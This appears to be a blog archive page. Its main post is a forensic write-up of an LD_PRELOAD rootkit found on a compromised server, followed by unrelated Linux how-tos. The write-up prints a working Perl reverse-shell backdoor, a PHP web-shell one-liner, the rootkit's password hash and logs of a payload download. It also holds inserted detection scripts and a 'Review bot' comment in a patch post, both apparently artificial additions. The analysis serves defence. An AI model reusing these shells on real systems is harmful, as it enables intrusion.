A simple ls of /mnt/part1/lib/ revealed that ld-linuxv.so.1 was there. I ran strings on it:
# strings /lib/ld-linuxv.so.1
__gmon_start__
_init
_fini
__cxa_finalize
_Jv_RegisterClasses
execve
dlsym
fopen
fprintf
fclose
puts
system
crypt
strdup
readdir64
strstr
__xstat64
__errno_location
__lxstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
vasprintf
getspnam_r
getspnam
getpwnam
pam_authenticate
inssh
gotpass
__libc_start_main
logit
setuid
setgid
seteuid
setegid
read
fwrite
accept
htons
doshell
doconnect
fork
dup2
stdout
fflush
stdin
fscanf
sleep
exit
waitpid
socket
libdl.so.2
libc.so.6
_edata
__bss_start
_end
GLIBC_2.0
GLIBC_2.1.3
GLIBC_2.1
root
@^_]
`^_]
ld.so.preload
ld-linuxv.so.1
_so_cache
execve
/var/opt/_so_cache/ld
%s:%s
Welcome master
crypt
readdir64
__xstat64
__lxstat64
opendir
login
pututline
open64
lastlog
pam_open_session
pam_close_session
syslog
getspnam_r
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
getspnam
getpwnam
root
/dev/null
normal
pam_authenticate
pam_get_item
Password:
__libc_start_main
/var/opt/_so_cache/lc
local
/usr/sbin/sshd
/bin/sh
read
write
accept
/usr/sbin/crond
HISTFILE=/dev/null
%99s
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
/bin/sh

As one can easily see there’s some sort of password hash inside and references to /usr/sbin/sshd, /bin/sh and setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted to the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) thought that we were dealing with a kernel rootkit. However, after carefully studying the disassembled dead listing of ld-linuxv.so.1, it became clear that it was a shared library based rootkit. Specifically, the intruder created the /etc/ld.so.preload file on the system with just one entry: the path where he saved the ld-linuxv.so.1 shared library, namely /lib/ld-linuxv.so.1. This has the effect of preloading ld-linuxv.so.1 every single time a dynamically linked executable is run by a user. Using the well-known technique of dlsym(RTLD_NEXT, symbol), in which the run-time address of the symbol in the next library after the current one is returned to allow the creation of wrappers, the ld-linuxv.so.1 shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks and brief explanations of what some of them do:
crypt
readdir64
__xstat64
__lxstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
getspnam_r
getspnam
getpwnam
pam_authenticate
pam_get_item
__libc_start_main
read
write
accept

The hijacked accept() function sends a reverse, i.e. outgoing, shell to the IP address that initiated the incoming connection at port 80 only if the incoming IP address is a specific one. Afterwards it calls the original accept() system call. The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value (“$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0”). The hijacked read() and write() functions of the shared library wrap the corresponding system calls and if the current process is ssh (client or daemon), their buffers are appended to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.
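The strings listing in section I already contains most of what section II explains; the script below is an added example (not from the original post or from argp’s analysis) that triages such a listing by grouping the imported/overridden symbols into the roles described above (file hiding, credential backdoor, session/log tampering, ssh sniffer) and pulling out the literal giveaways: ld.so.preload, HISTFILE=/dev/null, the _so_cache paths and the hardcoded MD5-crypt hash. The sample is a constructed subset of the listing; the scoring thresholds are this example’s own heuristics.

```python
"""Triage 'strings' output of a suspect shared library for LD_PRELOAD rootkit traits."""
import re

# Roles taken from the analysis above; plain libc users also import some of these,
# so the verdict only fires when several roles and a preloader signature coincide.
ROLES = {
    "hiding": {"readdir64", "__xstat64", "__lxstat64", "opendir", "open64"},
    "backdoor": {"crypt", "getspnam", "getspnam_r", "getpwnam",
                 "pam_authenticate", "pam_get_item"},
    "tampering": {"login", "pututline", "lastlog", "syslog",
                  "pam_open_session", "pam_close_session"},
    "sniffer": {"read", "write", "accept", "dup2", "fork", "execve"},
}
GIVEAWAYS = ("ld.so.preload", "HISTFILE=", "/bin/sh", "Welcome master",
             "_so_cache", "dlsym")
MD5CRYPT = re.compile(r"\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}")

# Constructed subset of the strings listing above (one string per line).
SAMPLE = "\n".join("""
dlsym execve fopen system crypt readdir64 __xstat64 __lxstat64 opendir login
pututline open64 pam_open_session pam_close_session syslog getspnam_r getspnam
getpwnam pam_authenticate pam_get_item __libc_start_main setuid read write
accept fork dup2 socket ld.so.preload ld-linuxv.so.1 _so_cache lastlog
/var/opt/_so_cache/ld $1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0 /dev/null
/usr/sbin/sshd /bin/sh /usr/sbin/crond HISTFILE=/dev/null /var/opt/_so_cache/lc
""".split()) + "\nWelcome master\n"


def verdict(roles, literals, hashes):
    """Crude scoring: a preloader that hides files and carries a password is a rootkit."""
    preload = "dlsym" in literals or any("ld.so.preload" in s for s in literals)
    if preload and roles["hiding"] and (roles["backdoor"] or hashes):
        return "likely LD_PRELOAD rootkit (preloader + file hiding + credential backdoor)"
    if hashes or sum(1 for syms in roles.values() if syms) >= 2:
        return "suspicious: review by hand"
    return "no rootkit traits seen"


def triage(strings_output):
    """Map strings output to {roles, literals, hashes, verdict}."""
    seen = {s.strip() for s in strings_output.splitlines() if s.strip()}
    roles = {role: sorted(seen & syms) for role, syms in ROLES.items()}
    literals = sorted(s for s in seen if any(g in s for g in GIVEAWAYS))
    hashes = sorted({m.group(0) for s in seen for m in MD5CRYPT.finditer(s)})
    return {"roles": roles, "literals": literals, "hashes": hashes,
            "verdict": verdict(roles, literals, hashes)}


if __name__ == "__main__":
    report = triage(SAMPLE)
    for role, syms in report["roles"].items():
        print(f"{role:10s} {' '.join(syms)}")
    print("literals:", report["literals"])
    print("hashes:  ", report["hashes"])
    print("verdict: ", report["verdict"])
```

On a live box the listing itself has to come from an offline image, as the post does, since the preloaded library also hides its own file from tools run on the infected system.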

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the logs of the server. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn’t show anything striking at first sight, but when I opened /mnt/part1/var/log/apache2/error.log.1 I faced these entries at the bottom:

--01:05:38-- http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext'
Resolving ABCDEFGHIJ.150m.com... 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext' (Permission denied).
--01:05:51-- http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext'
Resolving ABCDEFGHIJ.150m.com... 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]

0K 100% 18.61 MB/s

01:05:51 (18.61 MB/s) - `foobar.ext' saved [695/695]

--01:17:14-- http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext'
Resolving ABCDEFGHIJ.150m.com... 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext' (Permission denied).
--01:17:26-- http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext'
Resolving ABCDEFGHIJ.150m.com... 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 695 [text/plain]

0K 100% 25.30 MB/s

01:17:26 (25.30 MB/s) - `foobar.ext' saved [695/695]

So this was the entrance point. Someone got through a web app to the box and was able to run code.
I downloaded “foobar.ext” from the same url and it was a perl script.

#!/usr/bin/perl
# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source
# Code

use Socket;

print "[*] Dumping Arguments\n";

$host = "A.B.C.D";
$port = XYZ;

if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("[-] Unknown Protocol\n");

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Socket Error\n");

my $target = inet_aton($host);

if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("[-] Unable to Connect\n");
}
print "[*] Spawning Shell\n";

if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}

Since I got the time when foobar.ext was downloaded I looked again at the apache2 access.log to see what was going on at the time.
Here are some entries:

A.B.C.D - - [15/Aug/2009:01:05:33 +0300] "GET http://www.domain.com/admin/ HTTP/1.1" 302 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:34 +0300] "POST http://www.domain.com/admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1" 200 303 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:34 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 131 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:38 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:47 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 52 "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:50 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 - "-" "Mozilla Firefox"
A.B.C.D - - [15/Aug/2009:01:05:51 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 59 "-" "Mozilla Firefox"

The second entry, with the POST looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This one-liner hands whatever arrives in a “Shell:” request header to system(), so it runs commands using the account of the user running the apache2 server.
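To make the pattern in those log entries something you can look for on other servers, here is an added example (my code, not from the original post) that parses Apache combined-format lines, flags a POST whose path chains two .php components (the record_company.php/password_forgotten.php path-info trick above) and then lists the PHP scripts the same client requested within the next two minutes, which is how a freshly dropped file like imagedisplay.php shows up. The log lines are constructed to mirror the entries above, with the documentation address 203.0.113.5 standing in for the attacker’s A.B.C.D.

```python
"""Flag the request chain seen above in Apache combined-format access logs.

Added example, not code from the original post. The log lines are constructed
to mirror the post's entries; 203.0.113.5 stands in for the attacker's A.B.C.D.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Combined log format; the request target may be a bare path or, as in the
# post, an absolute URL. The size field is "-" when Apache sent no body.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP path-info trick: a real script name followed by a second ".php" component.
PATHINFO_RE = re.compile(r'\.php/.*\.php$', re.IGNORECASE)

SAMPLE_LOG = [  # constructed
    '203.0.113.5 - - [15/Aug/2009:01:05:33 +0300] "GET http://www.domain.com/admin/ HTTP/1.1" 302 - "-" "Mozilla Firefox"',
    '203.0.113.5 - - [15/Aug/2009:01:05:34 +0300] "POST http://www.domain.com/admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1" 200 303 "-" "Mozilla Firefox"',
    '203.0.113.5 - - [15/Aug/2009:01:05:34 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 131 "-" "Mozilla Firefox"',
    '203.0.113.5 - - [15/Aug/2009:01:05:38 +0300] "GET http://www.domain.com/images/imagedisplay.php HTTP/1.1" 200 - "-" "Mozilla Firefox"',
    '198.51.100.7 - - [15/Aug/2009:01:05:40 +0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e['time'] = datetime.strptime(e['ts'], '%d/%b/%Y:%H:%M:%S %z')
    e['path'] = urlsplit(e['target']).path   # drops scheme/host and the query string
    e['size'] = 0 if e['size'] == '-' else int(e['size'])
    return e


def find_suspicious(lines, window=timedelta(minutes=2)):
    """Return (kind, ip, path) findings: path-info POSTs and the PHP scripts
    the same client requested within `window` afterwards."""
    entries = [e for e in map(parse_line, lines) if e]
    findings = []
    for i, e in enumerate(entries):
        if e['method'] != 'POST' or not PATHINFO_RE.search(e['path']):
            continue
        findings.append(('php-pathinfo-post', e['ip'], e['path']))
        seen = set()
        for f in entries[i + 1:]:
            if f['time'] - e['time'] > window:
                break          # log is time-ordered, nothing later is in the window
            if (f['ip'] == e['ip'] and f['path'] != e['path']
                    and f['path'].lower().endswith('.php') and f['path'] not in seen):
                seen.add(f['path'])
                findings.append(('followup-script', f['ip'], f['path']))
    return findings


if __name__ == '__main__':
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding)
```

On a real server run `find_suspicious(open('/var/log/apache2/access.log'))`; every followup-script hit is a file worth checking against the package or site release for the kind of one-liner shown above.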

Part 3: Conclusion and food for thought
To conclude on what happened:
1) The attacker used the zencart vulnerability to create the imagedisplay.php file.
2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.
3) Using the imagedisplay.php file he was able to make the server run foobar.ext, which is a reverse shell. He could now connect to the machine.
4) Using some local exploit(s) he was probably able to become root.
5) Since he was root he uploaded/compiled ld-linuxv.so.1 and created /etc/ld.so.preload. From then on every (dynamically linked) executable would load this “trojaned” library first, which gives him backdoor access to the box and hides it from the system. So there is his rootkit :)

Fortunately the rootkit had problems: unless the /var/opt/_so_cache/ directory had been created manually, it couldn’t write its lc and ld files inside it. Once the _so_cache dir was created it started logging.
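As a quick triage for the two artifacts described in points 5 and above (the ld.so.preload entry and the _so_cache directory), here is an added example, not part of the original post: it reads /etc/ld.so.preload, flags entries outside the system library directories, names that merely resemble the real dynamic loader (ld-linuxv.so.1 versus ld-linux.so.2), and entries whose file is missing, and checks whether the drop directory exists. The sample preload body is constructed and /lib/ld-linuxv.so.1 is an assumed install path; the post does not say where the library was placed.

```python
"""Audit /etc/ld.so.preload for the signs described in this write-up.

Added example, not part of the original post. The loader-lookalike name and
the /var/opt/_so_cache drop directory come from the post; the preload body is
constructed and /lib/ld-linuxv.so.1 is an assumed install path.
"""
import os
import re

PRELOAD_FILE = '/etc/ld.so.preload'
DROP_DIR = '/var/opt/_so_cache'          # where the rootkit wrote its lc and ld files
# Legitimate preload libraries normally live under the system library prefixes.
TRUSTED_PREFIXES = ('/lib/', '/lib64/', '/usr/lib/', '/usr/lib64/', '/usr/local/lib/')
# Real dynamic loader sonames (ld-linux.so.2, ld-linux-x86-64.so.2, ...);
# "ld-linuxv.so.1" looks like one but is not.
LOADER_RE = re.compile(r'^ld-linux(-[\w-]+)?\.so\.\d+$')

SAMPLE_PRELOAD = '/lib/ld-linuxv.so.1\n'   # constructed, modelled on the post


def parse_preload(text):
    """ld.so.preload is a whitespace-separated list of library paths."""
    return text.split()


def audit_preload_text(text, exists=os.path.exists):
    """Return (finding, path) pairs for every listed library that looks wrong."""
    findings = []
    for lib in parse_preload(text):
        name = os.path.basename(lib)
        if not lib.startswith(TRUSTED_PREFIXES):
            findings.append(('untrusted-location', lib))
        if name.startswith('ld-linux') and not LOADER_RE.match(name):
            findings.append(('loader-lookalike', lib))
        if not exists(lib):
            findings.append(('missing-file', lib))
    return findings


def audit_host(exists=os.path.exists, read=None):
    """Check the live system; `exists`/`read` can be swapped for a mocked one."""
    if read is None:
        def read(path):
            with open(path) as fh:
                return fh.read()
    findings = []
    if exists(PRELOAD_FILE):
        findings.append(('preload-present', PRELOAD_FILE))
        findings.extend(audit_preload_text(read(PRELOAD_FILE), exists))
    if exists(DROP_DIR):
        findings.append(('drop-dir-present', DROP_DIR))
    return findings


if __name__ == '__main__':
    for finding in audit_host() or [('clean', '-')]:
        print(*finding)
```

One caveat that follows directly from how this rootkit works: a preloaded library that hooks libc’s file functions can hide /etc/ld.so.preload and its own file from every dynamically linked process, this script included. Run the check from a statically linked tool or from a rescue medium with the suspect disk mounted, and treat a clean result from the live system as inconclusive.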

If there are any more discoveries about the rootkit they will be posted in a new post. If someone else wants to analyze the rootkit I would be more than happy if they posted a link to the analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the ld-linuxv.so.1 library and the perl script foobar.ext (use at your own risk; the attacker’s host/ip have been removed from the perl script): linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs

Fixing image distortion on websites using Firefox/Iceweasel 3.5 on Debian testing with intel xorg driver

Lately I noticed some image distortion appearing on some websites using my laptop with Debian squeeze. Menus on swiftfox did not appear as they should, some logos appeared out of their place and there were artifacts and other annoying things. For example Planet Gnome looked like this:
[screenshot: image-distortion]
When using iceweasel 3.0.12 everything looked fine. Then I followed a guide to install Iceweasel 3.5 from experimental to my system. Images looked distorted again. So there must have been a problem with the latest xulrunner….

After some googling I bumped into Debian bug #491871 – [965GM EXA] display corruption with xulrunner 1.9. Following post #67 on that thread I was able to repair my xorg.conf to something that fixed the image distortion. Now Planet Gnome looks like this:
[screenshot: no-image-distortion]

Some info:

# apt-cache policy iceweasel xserver-xorg-video-intel xulrunner-1.9.1
iceweasel:
  Installed: 3.5.1-1
  Candidate: 3.5.1-1
  Version table:
 *** 3.5.1-1 0
          1 http://ftp.debian.org experimental/main Packages
        100 /var/lib/dpkg/status
     3.0.12-1 0
        500 http://ftp.de.debian.org squeeze/main Packages
         99 http://ftp.de.debian.org sid/main Packages
xserver-xorg-video-intel:
  Installed: 2:2.3.2-2+lenny6
  Candidate: 2:2.3.2-2+lenny6
  Version table:
     2:2.8.0-2 0
         99 http://ftp.de.debian.org sid/main Packages
 *** 2:2.3.2-2+lenny6 0
        500 http://ftp.de.debian.org squeeze/main Packages
        100 /var/lib/dpkg/status
xulrunner-1.9.1:
  Installed: 1.9.1.1-2
  Candidate: 1.9.1.1-2
  Version table:
 *** 1.9.1.1-2 0
          1 http://ftp.debian.org experimental/main Packages
        100 /var/lib/dpkg/status

minor uniformity patch for smplayer

One of the things that good Linux applications should have is uniformity. Just like Mac OS X does. All applications should use the same keybindings to perform the same tasks. For example, on _every_ OS X application, in order to quit it you have to press “CMD+Q”, it’s that simple and everybody follows it. Everybody. On Linux though there are some applications that simply don’t care about uniformity. One of these applications is smplayer.

While it is almost standard for Linux applications to quit using Ctrl+Q, smplayer simply doesn’t have this option. It has the option of closing the current video with Ctrl+X but it doesn’t have the simple option of quitting using a keyboard shortcut.

So, the following (one-liner, actually) patch does exactly what I described above: it makes smplayer quit with “Ctrl+Q”.

The screenshot that shows what the patch does:
[screenshot: smplayer]

smplayer-0.6.8-quit.patch:
--- smplayer-0.6.8/src/baseguiplus.cpp 2009-08-13 16:07:04.000000000 +0300
+++ smplayer-0.6.8/src/baseguiplus.cpp 2009-08-13 16:08:22.000000000 +0300
@@ -67,8 +67,7 @@
tray->setToolTip( "SMPlayer" );
connect( tray, SIGNAL(activated(QSystemTrayIcon::ActivationReason)),
this, SLOT(trayIconActivated(QSystemTrayIcon::ActivationReason)));
-
- quitAct = new MyAction(this, "quit");
+ quitAct = new MyAction(QKeySequence("Ctrl+Q"), this, "quit");
connect( quitAct, SIGNAL(triggered()), this, SLOT(quit()) );
openMenu->addAction(quitAct);
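Review bot: the `-` line that deletes the blank line above `quitAct` is an unrelated whitespace change in what is otherwise a one-line patch; drop it so the hunk contains only the `quitAct = new MyAction(QKeySequence("Ctrl+Q"), this, "quit");` replacement (the header would then read `@@ -67,8 +67,8 @@`). Since the post itself notes that keybindings are also set through Preferences, confirm that this hardcoded default still shows up there and is overridden by a user's saved shortcut before sending it upstream.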

And a patched ebuild for smplayer-0.6.8 to use this minor patch (only one line is added to the ebuild):
smplayer-0.6.8-r1.ebuild

P.S. Keybindings in smplayer can be set through Preferences, and someone could actually put Ctrl+Q as the quit shortcut but I think that this should be the default setting like most other applications have it. Uniformity matters.

Trying to achieve a more stable hybrid (broadcom-wl) kernel module for broadcom 4328

On my Macbook (4,1) I am currently using Debian with kernel 2.6.30-1-686-bigmem. This Macbook has Broadcom 4328 wireless chipset installed (02:00.0 Network controller: Broadcom Corporation BCM4328 802.11a/b/g/n (rev 03)) and unfortunately the necessary kernel module provided by Broadcom is pretty unstable. Or very unstable. Oh well…it’s totally unstable.

I had random freezes, usually when I first booted and tried to modprobe the module. After some searching around the net and a lot of experiments I’ve managed to create a kernel module that looks quite stable. At least I stopped getting any more lockups and freezes… To reproduce the module with the patches I’ve used, follow the directions below step by step.

Find your kernel version:
mybox:~# uname -r
2.6.30-1-686-bigmem

Install kernel header files related to the kernel version you found (on the above example it is: 2.6.30-1-686-bigmem):
mybox:~# aptitude install linux-headers-2.6.30-1-686-bigmem

Remember to replace the version (2.6.30-1-686-bigmem) with the output of uname -r on your box.

Create necessary dirs:
mybox:~# mkdir hybrid_wl
mybox:~# cd hybrid_wl

Download Linux drivers package from Broadcom:
802.11 Linux STA 32-bit Driver
(Driver info site: 802.11 Linux STA driver)
mybox:~/hybrid_wl# wget http://www.broadcom.com/docs/linux_sta/hybrid-portsrc-x86_32-v5_10_91_9.tar.gz

Download a few more patches from Archlinux and Gentoo:
hidden-essid patch
2.6.30 patch 1
2.6.30 patch 2
hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff
mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/hidden-essid.patch
mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/broadcom-sta-5.10.91.9-linux-2.6.30.patch
mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/broadcom-sta-5.10.91.9-linux-2.6.30-2.patch
mybox:~/hybrid_wl# wget -O hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff http://bugs.gentoo.org/attachment.cgi?id=195182

Extract package:
mybox:~/hybrid_wl# tar -xzf /path/to/hybrid-portsrc-x86_32-v5_10_91_9.tar.gz

Start Patching:
mybox:~/hybrid_wl# sed -i hidden-essid.patch -e 's|5.10.79.10|src/wl/sys|g'
mybox:~/hybrid_wl# patch -p0 < hidden-essid.patch
patching file src/wl/sys/wl_iw.c
mybox:~/hybrid_wl# sed -i broadcom-sta-5.10.91.9-linux-2.6.30.patch -e 's|hybrid-portsrc-x86_32-v5_10_91_9.orig/||g'
mybox:~/hybrid_wl# sed -i broadcom-sta-5.10.91.9-linux-2.6.30.patch -e 's|hybrid-portsrc-x86_32-v5_10_91_9/||g'
mybox:~/hybrid_wl# patch -p0 <broadcom-sta-5.10.91.9-linux-2.6.30.patch
patching file src/wl/sys/wl_iw.c
Hunk #1 succeeded at 611 (offset 1 line).
Hunk #2 succeeded at 640 (offset 1 line).
Hunk #3 succeeded at 1119 (offset 1 line).
Hunk #4 succeeded at 1147 (offset 1 line).
Hunk #5 succeeded at 1807 (offset 1 line).
Hunk #6 succeeded at 1942 (offset 1 line).
patching file src/wl/sys/wl_linux.c
patching file src/wl/sys/wl_linux.h
mybox:~/hybrid_wl# patch -p0 < broadcom-sta-5.10.91.9-linux-2.6.30-2.patch
patching file src/wl/sys/wl_linux.c
mybox:~/hybrid_wl# sed -i hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff -e 's|a/src/|src/|g'
mybox:~/hybrid_wl# sed -i hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff -e 's|b/src/|src/|g'
mybox:~/hybrid_wl# patch -p0 < hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff
patching file src/wl/sys/wl_linux.c
Hunk #1 succeeded at 225 (offset 6 lines).
patching file src/wl/sys/wl_iw.c

Compile the kernel module:
mybox:~/hybrid_wl# make -C /lib/modules/2.6.30-1-686-bigmem/build M=`pwd` clean
make: Entering directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
make: Leaving directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
mybox:~/hybrid_wl# make -C /lib/modules/2.6.30-1-686-bigmem/build M=`pwd`
make: Entering directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
LD /root/hybrid_wl/built-in.o
CC [M] /root/hybrid_wl/src/wl/sys/wl_linux.o
CC [M] /root/hybrid_wl/src/wl/sys/wl_iw.o
CC [M] /root/hybrid_wl/src/shared/linux_osl.o
LD [M] /root/hybrid_wl/wl.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: modpost: missing MODULE_LICENSE() in /root/hybrid_wl/wl.o
see include/linux/module.h for more information
CC /root/hybrid_wl/wl.mod.o
LD [M] /root/hybrid_wl/wl.ko
make: Leaving directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'

Install the new module:
mybox:~/hybrid_wl# cp wl.ko /lib/modules/2.6.30-1-686-bigmem/kernel/drivers/net/wireless/
mybox:~/hybrid_wl# depmod
mybox:~/hybrid_wl# modprobe wl

Check if everything loads correctly:
mybox:~/hybrid_wl# dmesg |tail
[ 66.229797] lib80211: common routines for IEEE802.11 drivers
[ 66.229805] lib80211_crypt: registered algorithm 'NULL'
[ 66.301793] wl: module license 'unspecified' taints kernel.
[ 66.301802] Disabling lock debugging due to kernel taint
[ 66.305919] wl 0000:02:00.0: PCI INT A -> GSI 16 (level, low) -> IRQ 16
[ 66.305933] wl 0000:02:00.0: setting latency timer to 64
[ 66.406146] lib80211_crypt: registered algorithm 'TKIP'
[ 66.408646] eth1: Broadcom BCM4328 802.11 Wireless Controller 5.10.91.9
[ 76.524135] eth1: no IPv6 routers present

You can also check the iwconfig output. Hopefully everything will be fine…
I hope this saves a few hours of searching and experimenting for some people…

References:
1) 802.11 Linux STA driver
2) AUR broadcom-wl 5.10.91.9-2
3) Gentoo Bug: 284450 (New ebuild: net/wireless/broadcom-sta)

Vodafone, Cosmote 3G on Linux (wvdial and umtsmon)

The following configs can be used when you have either Vodafone Mobile Internet or Cosmote Internet on the Go or both 3G USB sticks and you want to connect to the 3G Internet (in Greece) while using Linux. I’ll provide two ways to connect to 3G, the command line way using wvdial and the GUI way using umtsmon.

1) Using wvdial
Create /etc/wvdial.conf:

[Dialer Defaults]
New PPPD = yes
Dial Command = ATDT
Dial Attempts = 1
Modem = /dev/ttyUSB0
Modem Type = Analog Modem
ISDN = 0
#commented out see the comments on the post.
#Baud = 460800
Username = user
Password = pass
Init1 = ATZ
Init2 = AT&F E1 V1 X1 &D2 &C1 S
[Dialer cosmote]
Phone = *99#
Stupid Mode = 1
Init3 = AT+CGDCONT=1,"IP","internet"
[Dialer vodafone]
Phone = *99#
Stupid Mode = 1
Init3 = AT+CGDCONT=1,"IP","internet"
[Dialer vfPIN]
Init4 = AT+CPIN=1234
[Dialer cmPIN]
Init4 = AT+CPIN=5678

WARNING: You HAVE to change the PINs on the last part of the config

To connect to Cosmote, plug in the usb stick:

# wvdial cmPIN
# wvdial cosmote

To connect to Vodafone, plug in the usb stick:

# wvdial vfPIN
# wvdial vodafone

2) Using umtsmon
Connection->Manage Profiles and create the necessary profiles with settings that look like these:
[screenshot: umtsmon]
Username and Password do not really matter. Enter something like User/Pass or Username/Password.

Both setups were tested on Debian and Gentoo and work just fine.

If someone has the Wind ADSM settings please provide them as a comment so I can complete the post with all three Greek 3G providers.

References: List of AT commands

Firefox 3.0.11 to 3.5b99 migration glitch on certificate authority root files

I’ve recently migrated on my debian from iceweasel (firefox) 3.0.X to swiftfox (firefox) 3.5b99 and I noticed that I could not import any new certificate authority root files. When I used a new profile everything worked as expected, so it was something that had to do with the migration of my old version 3.0.X profile to the new version 3.5 one. It looks like there has been a change in the way firefox 3.0.X and firefox 3.5 handle the cert8.db file inside the profile directory. As soon as I deleted the file and restarted firefox I could import new certificate authority root files just fine. Of course I lost the old ones I had imported in the past…

Switching from Iceweasel to Swiftfox on debian

I’ve bumped into an Iceweasel + adblock plus bug: iceweasel: AdBlock Plus (1.0.2) custom element hiding filters does not work
It looks like Iceweasel from the stable branch of debian (version 3.0.6-1) has a problem hiding elements from websites. That makes some parts of adblock plus useless and ads start appearing on various websites.
What’s weird is that the problem only appears on Iceweasel and not on official Firefox (as the bug report says).

My options were to either a) switch to a testing/unstable version of Iceweasel from debian, b) get a binary package from firefox website or c) get another custom version. I chose method c) and I got swiftfox. Since Swiftfox provides a nice debian repo it was really easy to install and test. The whole experiment got even more interesting since swiftfox provides builds for firefox version 3.5…

After an update-alternatives --config x-www-browser I was ready to test it.
Swiftfox 3.5b4 works great with adblock plus and it even feels a bit faster. I can’t really tell for sure though. The only addon I had to reinstall was firegpg.

My impressions are great so far and I think I will keep it, at least until the bug mentioned gets resolved somehow on the stable branch.

Handling right clicks on a macbook running Linux

I’ve finally settled down to a solution that I am happy with. I used to have the following options inside my Xorg.conf:
Section "InputDevice"
Identifier "Synaptics Touchpad"
Driver "synaptics"
[...snip...]
Option "TapButton1" "1"
Option "TapButton2" "3"
Option "TapButton3" "2"
Option "VertTwoFingerScroll" "1"
Option "HorizTwoFingerScroll" "1"
[...snip...]

This works like this:
i) a single tap is a left click
ii) a two-finger tap is a right click
iii) a three-finger tap is a middle click
and you could scroll horizontally and vertically using two fingers on the touchpad, like Mac OS X.
